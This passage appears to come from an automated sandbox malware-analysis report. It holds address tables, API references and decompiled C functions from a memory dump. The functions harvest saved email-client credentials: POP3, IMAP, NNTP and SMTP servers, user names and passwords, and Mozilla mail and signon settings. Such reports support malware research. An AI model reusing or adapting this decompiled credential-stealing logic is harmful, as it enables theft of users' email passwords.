                                                                                              0x0040fbbf
                                                                                              0x0040fbc6
                                                                                              0x0040fbcd
                                                                                              0x0040fbd4
                                                                                              0x0040fbdb
                                                                                              0x0040fbe2
                                                                                              0x0040fbe9
                                                                                              0x0040fbf0
                                                                                              0x0040fbf7
                                                                                              0x0040fde5
                                                                                              0x0040fde8
                                                                                              0x0040fdee
                                                                                              0x0040fdf1
                                                                                              0x0040fe04
                                                                                              0x0040fdfd
                                                                                              0x0040fdfd
                                                                                              0x00000000
                                                                                              0x0040fdfd
                                                                                              0x0040fdf1
                                                                                              0x0040fbfe
                                                                                              0x0040fc0d
                                                                                              0x0040fc10
                                                                                              0x0040fc14
                                                                                              0x0040fc17
                                                                                              0x0040fd94
                                                                                              0x0040fd98
                                                                                              0x0040fdd2
                                                                                              0x0040fdd5
                                                                                              0x0040fd9e
                                                                                              0x0040fda1
                                                                                              0x0040fda6
                                                                                              0x0040fdaa
                                                                                              0x0040fdaf
                                                                                              0x0040fdb6
                                                                                              0x0040fdb6
                                                                                              0x0040fdaf
                                                                                              0x0040fdb8
                                                                                              0x0040fdb8
                                                                                              0x0040fdd6
                                                                                              0x0040fdd7
                                                                                              0x0040fdd7
                                                                                              0x0040fdde
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fdde
                                                                                              0x0040fc1d
                                                                                              0x0040fc20
                                                                                              0x0040fc23
                                                                                              0x0040fc27
                                                                                              0x0040fc31
                                                                                              0x0040fc37
                                                                                              0x0040fc3c
                                                                                              0x0040fc41
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc43
                                                                                              0x0040fc47
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc49
                                                                                              0x0040fc51
                                                                                              0x0040fd5c
                                                                                              0x0040fd5c
                                                                                              0x0040fd60
                                                                                              0x0040fd63
                                                                                              0x0040fd6b
                                                                                              0x0040fd73
                                                                                              0x0040fd7c
                                                                                              0x0040fd81
                                                                                              0x0040fd86
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd88
                                                                                              0x0040fd8f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd91
                                                                                              0x00000000
                                                                                              0x0040fd91
                                                                                              0x0040fdc5
                                                                                              0x0040fdc8
                                                                                              0x0040fdc9
                                                                                              0x00000000
                                                                                              0x0040fdc9
                                                                                              0x0040fc57
                                                                                              0x0040fc57
                                                                                              0x0040fc5b
                                                                                              0x0040fc60
                                                                                              0x0040fd11
                                                                                              0x0040fd11
                                                                                              0x0040fd15
                                                                                              0x0040fd17
                                                                                              0x0040fd26
                                                                                              0x0040fd26
                                                                                              0x0040fd2a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd1d
                                                                                              0x0040fd2f
                                                                                              0x0040fd31
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd39
                                                                                              0x0040fd42
                                                                                              0x0040fd47
                                                                                              0x0040fd4f
                                                                                              0x0040fd52
                                                                                              0x0040fd55
                                                                                              0x0040fd56
                                                                                              0x00000000
                                                                                              0x0040fd56
                                                                                              0x0040fd1f
                                                                                              0x0040fd23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fd25
                                                                                              0x0040fd25
                                                                                              0x0040fd2c
                                                                                              0x00000000
                                                                                              0x0040fc6f
                                                                                              0x0040fc6f
                                                                                              0x0040fc71
                                                                                              0x0040fc97
                                                                                              0x0040fc97
                                                                                              0x0040fc9b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc8e
                                                                                              0x0040fd0c
                                                                                              0x0040fca1
                                                                                              0x0040fca5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fcb3
                                                                                              0x0040fcbb
                                                                                              0x0040fcc4
                                                                                              0x0040fcc9
                                                                                              0x0040fcd4
                                                                                              0x0040fce3
                                                                                              0x0040fceb
                                                                                              0x0040fcec
                                                                                              0x0040fcf0
                                                                                              0x0040fcfc
                                                                                              0x0040fd02
                                                                                              0x0040fd03
                                                                                              0x00000000
                                                                                              0x0040fd03
                                                                                              0x0040fc90
                                                                                              0x0040fc94
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040fc96
                                                                                              0x0040fc96
                                                                                              0x0040fc9d
                                                                                              0x00000000
                                                                                              0x0040fc9d
                                                                                              0x0040fc60
                                                                                              0x0040fc7c
                                                                                              0x0040fc82
                                                                                              0x0040fc83
                                                                                              0x00000000
                                                                                              0x0040fc83
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040FC27
                                                                                              • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                              • memcpy.MSVCRT ref: 0040FCB3
                                                                                              • atoi.MSVCRT ref: 0040FCC4
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                              • API String ID: 1895597112-3210201812
                                                                                              • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                              • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                              • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                              • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004106BE, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E004106BE(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
					_t123 = E00406B74( *_t204);
					_t195 = _t201 + 0xf84;
					E004060D0(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060D0(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                                                              0x004106be
                                                                                              0x004106c2
                                                                                              0x004106de
                                                                                              0x004106e0
                                                                                              0x004106f5
                                                                                              0x004106fe
                                                                                              0x00410704
                                                                                              0x0041070a
                                                                                              0x0041070f
                                                                                              0x00410715
                                                                                              0x00410725
                                                                                              0x0041072d
                                                                                              0x00410733
                                                                                              0x00410739
                                                                                              0x0041073e
                                                                                              0x0041074e
                                                                                              0x00410756
                                                                                              0x0041075c
                                                                                              0x00410762
                                                                                              0x00410767
                                                                                              0x00410777
                                                                                              0x0041077f
                                                                                              0x00410785
                                                                                              0x0041078b
                                                                                              0x00410790
                                                                                              0x004107a0
                                                                                              0x004107a8
                                                                                              0x004107ae
                                                                                              0x004107b4
                                                                                              0x004107b9
                                                                                              0x004107c9
                                                                                              0x004107d1
                                                                                              0x004107d7
                                                                                              0x004107dd
                                                                                              0x004107e3
                                                                                              0x004107e3
                                                                                              0x004107fc
                                                                                              0x00410804
                                                                                              0x0041080a
                                                                                              0x00410810
                                                                                              0x00410816
                                                                                              0x00410816
                                                                                              0x0041082f
                                                                                              0x00410837
                                                                                              0x0041083d
                                                                                              0x00410843
                                                                                              0x00410849
                                                                                              0x00410849
                                                                                              0x00410862
                                                                                              0x0041086a
                                                                                              0x00410870
                                                                                              0x00410876
                                                                                              0x0041087c
                                                                                              0x0041087c
                                                                                              0x0041088c
                                                                                              0x00410891
                                                                                              0x00410895
                                                                                              0x004108aa
                                                                                              0x004108aa
                                                                                              0x004108b5
                                                                                              0x004108ba
                                                                                              0x004108be
                                                                                              0x004108d3
                                                                                              0x004108d3
                                                                                              0x004108de
                                                                                              0x004108e3
                                                                                              0x004108e7
                                                                                              0x004108fc
                                                                                              0x004108fc
                                                                                              0x00410907
                                                                                              0x0041090c
                                                                                              0x00410910
                                                                                              0x00410925
                                                                                              0x00410925
                                                                                              0x00410939
                                                                                              0x0041094d
                                                                                              0x00410952
                                                                                              0x00410959
                                                                                              0x00410962
                                                                                              0x00410964
                                                                                              0x00410979
                                                                                              0x0041098e
                                                                                              0x00410993
                                                                                              0x00410994
                                                                                              0x00410999
                                                                                              0x0041099f
                                                                                              0x004109a0
                                                                                              0x004109a9
                                                                                              0x004109b7
                                                                                              0x004109bd
                                                                                              0x004109bd
                                                                                              0x004109c3
                                                                                              0x004109c8
                                                                                              0x004109c9
                                                                                              0x004109d2
                                                                                              0x004109f6
                                                                                              0x00410a02
                                                                                              0x00410a08
                                                                                              0x004109d4
                                                                                              0x004109d4
                                                                                              0x004109d9
                                                                                              0x004109da
                                                                                              0x004109e3
                                                                                              0x00000000
                                                                                              0x004109e5
                                                                                              0x004109e5
                                                                                              0x004109ea
                                                                                              0x004109eb
                                                                                              0x004109f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004109f4
                                                                                              0x004109e3
                                                                                              0x00410a0e
                                                                                              0x00410a13
                                                                                              0x00410a14
                                                                                              0x00410a1d
                                                                                              0x00410a2b
                                                                                              0x00410a31
                                                                                              0x00410a31
                                                                                              0x00410a37
                                                                                              0x00410a3c
                                                                                              0x00410a3d
                                                                                              0x00410a46
                                                                                              0x00410a6a
                                                                                              0x00410a7c
                                                                                              0x00410a48
                                                                                              0x00410a48
                                                                                              0x00410a4d
                                                                                              0x00410a4e
                                                                                              0x00410a57
                                                                                              0x00000000
                                                                                              0x00410a59
                                                                                              0x00410a59
                                                                                              0x00410a5e
                                                                                              0x00410a5f
                                                                                              0x00410a68
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00410a68
                                                                                              0x00410a57
                                                                                              0x00410a89

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcmp$_stricmp$memcpystrlen
                                                                                              • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                              • API String ID: 1113949926-2499304436
                                                                                              • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                              • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                              • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                              • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C7CF, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C748(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L004115B2();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060D0(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C6F3(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L004115B2();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060D0(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060D0(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060D0(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L004115B2();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C6F3(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L004115B2();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060D0(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L004115B2();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060D0(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L004115B2();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062AD(_t139, _t152, _a8);
					}
				}
				return 1;
			}


























                                                                                              0x0040c7cf
                                                                                              0x0040c7ea
                                                                                              0x0040c7ed
                                                                                              0x0040c7f4
                                                                                              0x0040c7f9
                                                                                              0x0040c7ff
                                                                                              0x0040c804
                                                                                              0x0040c808
                                                                                              0x0040c816
                                                                                              0x0040c827
                                                                                              0x0040c818
                                                                                              0x0040c822
                                                                                              0x0040c822
                                                                                              0x0040c82f
                                                                                              0x0040c863
                                                                                              0x0040c868
                                                                                              0x0040c86b
                                                                                              0x0040c874
                                                                                              0x0040c879
                                                                                              0x0040c87f
                                                                                              0x0040c884
                                                                                              0x0040c874
                                                                                              0x0040c885
                                                                                              0x0040c88b
                                                                                              0x0040c890
                                                                                              0x0040c894
                                                                                              0x0040c8a2
                                                                                              0x0040c8b7
                                                                                              0x0040c8a4
                                                                                              0x0040c8b2
                                                                                              0x0040c8b2
                                                                                              0x0040c8bf
                                                                                              0x0040c8d2
                                                                                              0x0040c8d7
                                                                                              0x0040c8dc
                                                                                              0x0040c8df
                                                                                              0x0040c8e1
                                                                                              0x0040c8ea
                                                                                              0x0040c8ef
                                                                                              0x0040c8f5
                                                                                              0x0040c8fa
                                                                                              0x0040c8fb
                                                                                              0x0040c900
                                                                                              0x0040c903
                                                                                              0x0040c90c
                                                                                              0x0040c911
                                                                                              0x0040c917
                                                                                              0x0040c91c
                                                                                              0x0040c91d
                                                                                              0x0040c922
                                                                                              0x0040c925
                                                                                              0x0040c92e
                                                                                              0x0040c933
                                                                                              0x0040c939
                                                                                              0x0040c93e
                                                                                              0x0040c93f
                                                                                              0x0040c944
                                                                                              0x0040c947
                                                                                              0x0040c950
                                                                                              0x0040c955
                                                                                              0x0040c95b
                                                                                              0x0040c95b
                                                                                              0x0040c961
                                                                                              0x0040c966
                                                                                              0x0040c969
                                                                                              0x0040c972
                                                                                              0x0040c974
                                                                                              0x0040c979
                                                                                              0x0040c97c
                                                                                              0x0040c985
                                                                                              0x0040c987
                                                                                              0x0040c987
                                                                                              0x0040c985
                                                                                              0x0040c972
                                                                                              0x0040c991
                                                                                              0x0040c997
                                                                                              0x0040c99c
                                                                                              0x0040c9a0
                                                                                              0x0040c9a4
                                                                                              0x0040c9ae
                                                                                              0x0040c9c3
                                                                                              0x0040c9b0
                                                                                              0x0040c9b9
                                                                                              0x0040c9be
                                                                                              0x0040c9be
                                                                                              0x0040c9cb
                                                                                              0x0040c9da
                                                                                              0x0040c9df
                                                                                              0x0040c9e4
                                                                                              0x0040c9e7
                                                                                              0x0040c9e9
                                                                                              0x0040c9f2
                                                                                              0x0040c9f7
                                                                                              0x0040c9fd
                                                                                              0x0040ca02
                                                                                              0x0040ca03
                                                                                              0x0040ca08
                                                                                              0x0040ca0b
                                                                                              0x0040ca14
                                                                                              0x0040ca19
                                                                                              0x0040ca1c
                                                                                              0x0040ca21
                                                                                              0x0040ca14
                                                                                              0x0040ca22
                                                                                              0x0040ca27
                                                                                              0x0040ca2a
                                                                                              0x0040ca33
                                                                                              0x0040ca35
                                                                                              0x0040ca38
                                                                                              0x0040ca3e
                                                                                              0x0040ca45
                                                                                              0x0040ca54
                                                                                              0x0040ca5f
                                                                                              0x0040ca70
                                                                                              0x0040ca61
                                                                                              0x0040ca67
                                                                                              0x0040ca6d
                                                                                              0x0040ca5f
                                                                                              0x0040ca7a

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C7F4
                                                                                              • strlen.MSVCRT ref: 0040C7FF
                                                                                              • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                              • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                              • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                              • strlen.MSVCRT ref: 0040C88B
                                                                                              • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                              • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                              • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                              • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                              • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                              • atoi.MSVCRT ref: 0040C955
                                                                                                • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                                • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                                • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                              • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                              • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                              • strlen.MSVCRT ref: 0040C997
                                                                                              • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                              • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                              • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                              • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                              • strlen.MSVCRT ref: 0040CA45
                                                                                              • strlen.MSVCRT ref: 0040CA4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                              • API String ID: 736090197-593045482
                                                                                              • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                              • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                              • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                              • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
